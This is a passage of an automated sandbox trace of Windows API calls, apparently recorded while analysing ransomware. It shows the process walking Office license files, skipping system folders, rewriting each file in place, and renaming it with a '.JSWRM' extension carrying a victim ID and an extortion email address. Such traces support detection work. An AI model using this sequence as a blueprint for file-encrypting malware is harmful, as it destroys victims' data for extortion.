lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0107.872] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0107.872] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a480 [0107.872] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a480, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0107.872] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a480 | out: hHeap=0x1e0000) returned 1 [0107.872] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b2b8 [0107.872] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23ede0 [0107.872] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b2b8 | out: hHeap=0x1e0000) returned 1 [0107.872] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0107.872] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProO365R_SubTest-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectproo365r_subtest-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProO365R_SubTest-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectproo365r_subtest-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0107.873] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ede0 | out: hHeap=0x1e0000) returned 1 [0107.873] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2362f8 | out: hHeap=0x1e0000) returned 1 [0107.873] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0107.873] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0107.873] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0107.873] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe902e315, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe902e315, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe911317f, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x51b5, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProjectProO365R_SubTest-ppd.xrm-ms", cAlternateFileName="PRB093~1.XRM")) returned 1 [0107.873] lstrcmpiW (lpString1="ProjectProO365R_SubTest-ppd.xrm-ms", lpString2=".") returned 1 [0107.873] lstrcmpiW (lpString1="ProjectProO365R_SubTest-ppd.xrm-ms", lpString2="..") returned 1 [0107.873] lstrcmpiW (lpString1="ProjectProO365R_SubTest-ppd.xrm-ms", lpString2="...") returned 1 [0107.873] lstrcmpiW (lpString1="ProjectProO365R_SubTest-ppd.xrm-ms", lpString2="windows") returned -1 [0107.873] lstrcmpiW (lpString1="ProjectProO365R_SubTest-ppd.xrm-ms", lpString2="recovery") returned -1 [0107.873] lstrcmpiW (lpString1="ProjectProO365R_SubTest-ppd.xrm-ms", lpString2="perflogs") returned 1 [0107.873] lstrcmpiW (lpString1="ProjectProO365R_SubTest-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0107.873] lstrcmpiW (lpString1="ProjectProO365R_SubTest-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0107.873] lstrcmpiW (lpString1="ProjectProO365R_SubTest-ppd.xrm-ms", lpString2="system volume information") returned -1 [0107.873] lstrcmpiW (lpString1="ProjectProO365R_SubTest-ppd.xrm-ms", lpString2="msocache") returned 1 [0107.873] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0107.873] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProO365R_SubTest-ppd.xrm-ms", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0107.873] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0107.873] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProO365R_SubTest-ppd.xrm-ms", cchWideChar=34, lpMultiByteStr=0x22d0a0, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectProO365R_SubTest-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 34 [0107.874] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0107.874] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c118 [0107.874] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProO365R_SubTest-ppd.xrm-ms", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0107.874] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0107.874] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProO365R_SubTest-ppd.xrm-ms", cchWideChar=34, lpMultiByteStr=0x22d0d8, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectProO365R_SubTest-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 34 [0107.874] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c118 | out: hHeap=0x1e0000) returned 1 [0107.874] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0107.874] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0107.874] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0107.874] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0107.874] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0107.874] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProO365R_SubTest-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectproo365r_subtest-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0107.874] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=20917) returned 1 [0107.874] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.874] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x51b0) returned 0x24c1d0 [0107.874] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x51b0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x51b0, lpOverlapped=0x0) returned 1 [0107.878] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.878] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x51b0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x51b0, lpOverlapped=0x0) returned 1 [0107.878] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0107.878] CloseHandle (hObject=0x45c) returned 1 [0107.878] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0107.878] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0107.878] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0107.878] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0107.878] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0107.878] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0107.878] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0107.878] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3f0 [0107.878] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3f0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0107.878] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3f0 | out: hHeap=0x1e0000) returned 1 [0107.878] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b830 [0107.878] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23ef08 [0107.878] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b830 | out: hHeap=0x1e0000) returned 1 [0107.878] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0107.878] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProO365R_SubTest-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectproo365r_subtest-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProO365R_SubTest-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectproo365r_subtest-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0107.879] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ef08 | out: hHeap=0x1e0000) returned 1 [0107.879] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0107.879] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0107.879] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0107.879] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0107.879] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe945a501, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe945a501, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe953f396, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d6d, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProjectProO365R_SubTest-ul-oob.xrm-ms", cAlternateFileName="PR4859~1.XRM")) returned 1 [0107.879] lstrcmpiW (lpString1="ProjectProO365R_SubTest-ul-oob.xrm-ms", lpString2=".") returned 1 [0107.879] lstrcmpiW (lpString1="ProjectProO365R_SubTest-ul-oob.xrm-ms", lpString2="..") returned 1 [0107.879] lstrcmpiW (lpString1="ProjectProO365R_SubTest-ul-oob.xrm-ms", lpString2="...") returned 1 [0107.880] lstrcmpiW (lpString1="ProjectProO365R_SubTest-ul-oob.xrm-ms", lpString2="windows") returned -1 [0107.880] lstrcmpiW (lpString1="ProjectProO365R_SubTest-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0107.880] lstrcmpiW (lpString1="ProjectProO365R_SubTest-ul-oob.xrm-ms", lpString2="perflogs") returned 1 [0107.880] lstrcmpiW (lpString1="ProjectProO365R_SubTest-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0107.880] lstrcmpiW (lpString1="ProjectProO365R_SubTest-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0107.880] lstrcmpiW (lpString1="ProjectProO365R_SubTest-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0107.880] lstrcmpiW (lpString1="ProjectProO365R_SubTest-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0107.880] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22beb0 [0107.880] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProO365R_SubTest-ul-oob.xrm-ms", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0107.880] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0107.880] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProO365R_SubTest-ul-oob.xrm-ms", cchWideChar=37, lpMultiByteStr=0x22d0a0, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectProO365R_SubTest-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 37 [0107.880] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22beb0 | out: hHeap=0x1e0000) returned 1 [0107.880] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bda8 [0107.880] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProO365R_SubTest-ul-oob.xrm-ms", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0107.880] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0107.880] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProO365R_SubTest-ul-oob.xrm-ms", cchWideChar=37, lpMultiByteStr=0x22d260, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectProO365R_SubTest-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 37 [0107.880] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bda8 | out: hHeap=0x1e0000) returned 1 [0107.880] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236970 [0107.880] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0107.880] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0107.880] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0107.880] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236a28 [0107.880] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProO365R_SubTest-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectproo365r_subtest-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0107.881] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11629) returned 1 [0107.881] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.881] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d60) returned 0x24c1d0 [0107.881] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d60, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d60, lpOverlapped=0x0) returned 1 [0107.883] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.883] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d60, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d60, lpOverlapped=0x0) returned 1 [0107.883] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0107.883] CloseHandle (hObject=0x45c) returned 1 [0107.883] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0107.883] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0107.883] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0107.883] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0107.884] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0107.884] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0107.884] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0107.884] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a330 [0107.884] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a330, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0107.884] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a330 | out: hHeap=0x1e0000) returned 1 [0107.884] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b510 [0107.884] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23ede0 [0107.884] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b510 | out: hHeap=0x1e0000) returned 1 [0107.884] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0107.884] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProO365R_SubTest-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectproo365r_subtest-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProO365R_SubTest-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectproo365r_subtest-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0107.885] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ede0 | out: hHeap=0x1e0000) returned 1 [0107.885] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0107.885] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236a28 | out: hHeap=0x1e0000) returned 1 [0107.885] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0107.885] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0107.885] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe940e069, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe940e069, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe94f2f59, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2bb3, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProjectProO365R_SubTrial-pl.xrm-ms", cAlternateFileName="PRB245~1.XRM")) returned 1 [0107.885] lstrcmpiW (lpString1="ProjectProO365R_SubTrial-pl.xrm-ms", lpString2=".") returned 1 [0107.885] lstrcmpiW (lpString1="ProjectProO365R_SubTrial-pl.xrm-ms", lpString2="..") returned 1 [0107.885] lstrcmpiW (lpString1="ProjectProO365R_SubTrial-pl.xrm-ms", lpString2="...") returned 1 [0107.885] lstrcmpiW (lpString1="ProjectProO365R_SubTrial-pl.xrm-ms", lpString2="windows") returned -1 [0107.885] lstrcmpiW (lpString1="ProjectProO365R_SubTrial-pl.xrm-ms", lpString2="recovery") returned -1 [0107.885] lstrcmpiW (lpString1="ProjectProO365R_SubTrial-pl.xrm-ms", lpString2="perflogs") returned 1 [0107.885] lstrcmpiW (lpString1="ProjectProO365R_SubTrial-pl.xrm-ms", lpString2="documents and settings") returned 1 [0107.885] lstrcmpiW (lpString1="ProjectProO365R_SubTrial-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0107.885] lstrcmpiW (lpString1="ProjectProO365R_SubTrial-pl.xrm-ms", lpString2="system volume information") returned -1 [0107.885] lstrcmpiW (lpString1="ProjectProO365R_SubTrial-pl.xrm-ms", lpString2="msocache") returned 1 [0107.885] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7f8 [0107.885] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProO365R_SubTrial-pl.xrm-ms", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0107.885] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0107.885] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProO365R_SubTrial-pl.xrm-ms", cchWideChar=34, lpMultiByteStr=0x22cdc8, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectProO365R_SubTrial-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 34 [0107.885] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7f8 | out: hHeap=0x1e0000) returned 1 [0107.885] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c328 [0107.885] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProO365R_SubTrial-pl.xrm-ms", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0107.885] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0107.885] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProO365R_SubTrial-pl.xrm-ms", cchWideChar=34, lpMultiByteStr=0x22ce70, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectProO365R_SubTrial-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 34 [0107.885] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c328 | out: hHeap=0x1e0000) returned 1 [0107.885] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236800 [0107.885] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236970 | out: hHeap=0x1e0000) returned 1 [0107.885] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0107.885] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0107.885] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236188 [0107.886] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProO365R_SubTrial-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectproo365r_subtrial-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0107.886] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11187) returned 1 [0107.886] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.886] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2bb0) returned 0x24c1d0 [0107.886] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2bb0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2bb0, lpOverlapped=0x0) returned 1 [0107.888] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.888] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2bb0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: 